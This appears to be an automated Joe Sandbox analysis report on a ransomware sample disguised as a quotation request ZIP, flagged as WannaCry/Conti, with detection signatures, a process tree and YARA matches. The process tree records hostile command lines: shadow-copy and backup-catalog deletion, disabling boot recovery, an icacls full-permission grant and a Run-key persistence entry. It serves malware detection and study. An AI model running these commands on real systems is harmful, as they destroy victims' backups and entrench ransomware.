Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation (RFQ_196).zip.zip

Overview

General Information

Sample name:Request for Quotation (RFQ_196).zip.zip
Analysis ID:1375296
MD5:2747028c2334ea64ada17b371c9eb469
SHA1:ba52213356b615f2fd08d69191b325d0abe7f8f6
SHA256:f905bfd1b61ce94eb6d9d5d69157583416b6fc79dd5e4507e98fee7f537b19a0
Infos:

Detection

Wannacry, Conti
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
Yara detected Conti ransomware
Yara detected Wannacry ransomware
Command shell drops VBS files
Contains functionality to detect sleep reduction / modifications
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the document folder of the user
Found Tor onion address
Found stalling execution ending in API Sleep call
Installs TOR (Internet Anonymizer)
May use the Tor software to hide its network traffic
Modifies existing user documents (likely ransomware behavior)
Moves itself to temp directory
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Uses cmd line tools excessively to alter registry or file data
Writes many files with high entropy
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 3788 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 6648 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap4588:126:7zEvent8780 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • 7zG.exe (PID: 5848 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap12385:118:7zEvent28652 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • Proforma Invoice and Bank swift-REG.PI-0086547654.exe (PID: 3796 cmdline: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 7028 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 1004 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskdl.exe (PID: 6744 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 3356 cmdline: C:\Windows\system32\cmd.exe /c 118491705402797.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cscript.exe (PID: 6324 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
    • taskdl.exe (PID: 6328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3624 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1436 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2320 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1248 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4468 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6516 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1060 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3504 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5728 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6940 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6280 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4936 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2612 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3772 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7076 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6212 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6056 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2656 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5956 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4236 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6500 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5920 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5412 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5968 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5448 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 348 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 180 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6004 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5388 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6012 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3696 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6108 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5668 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6568 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskhsvc.exe (PID: 1220 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
        • conhost.exe (PID: 2184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5500 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • @WanaDecryptor@.exe (PID: 6196 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • cmd.exe (PID: 5720 cmdline: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 6576 cmdline: wmic shadowcopy delete MD5: E2DE6500DE1148C7F6027AD50AC8B891)
    • taskdl.exe (PID: 6256 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4672 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • cmd.exe (PID: 4376 cmdline: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7096 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • taskdl.exe (PID: 6964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1176 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3568 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6584 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6524 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2232 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2540 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3120 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7136 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1568 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5688 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3076 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4184 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2900 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2512 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4964 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6884 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5292 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5544 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4864 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5152 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2652 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2916 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4680 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6296 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5368 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4756 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6668 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6456 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1252 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5512 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2300 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 720 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6776 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5780 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6928 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5572 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6320 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3924 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3792 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1504 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6324 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3352 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4012 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3400 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7060 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5632 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4440 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4468 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6264 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3324 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4472 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6940 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5532 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6348 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6472 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6468 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3440 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 336 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6128 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 432 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2656 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2904 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6652 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4444 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3040 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5280 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5328 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5392 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5968 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5448 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1012 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5596 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5492 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2244 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4320 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2220 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3340 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2312 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 564 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5500 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3220 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7024 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • dllhost.exe (PID: 7096 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • @WanaDecryptor@.exe (PID: 6832 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6464 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1176 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4316 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1316 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7152 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6792 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6648 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7116 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6632 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2684 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6712 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2540 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3120 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6764 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6188 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 700 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7136 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3192 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1700 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1968 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2528 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6560 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6888 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6368 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5236 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4908 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1076 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2008 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5220 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1948 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5336 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2824 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4648 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6576 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6416 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6296 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4744 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
WannaCryptor, WannaCry, WannaCrypt
  • Lazarus Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor
NameDescriptionAttributionBlogpost URLsLink
Conti, Conti LockConti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.conti

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\AppData\Local\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
